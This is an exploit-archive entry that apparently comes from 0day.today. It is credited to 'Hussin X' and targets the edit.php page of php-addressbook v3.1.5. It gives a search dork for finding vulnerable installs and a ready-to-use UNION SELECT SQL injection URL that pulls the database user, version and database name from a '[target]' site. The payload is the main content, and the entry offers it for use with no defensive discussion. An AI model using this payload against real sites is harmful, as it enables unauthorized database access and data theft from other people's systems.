id: 10536
date: 12/31/2009
title: php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability
author: Hussin X
cves: 

============================================================
php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability
============================================================

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 
@    script : http://sourceforge.net/project/showfiles.php?group_id=157964
 
@    DorK   : php-addressbook v3.1.5
 
 
 
ExPloiT :
 
www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--
 


#  0day.today [2023-03-25]  #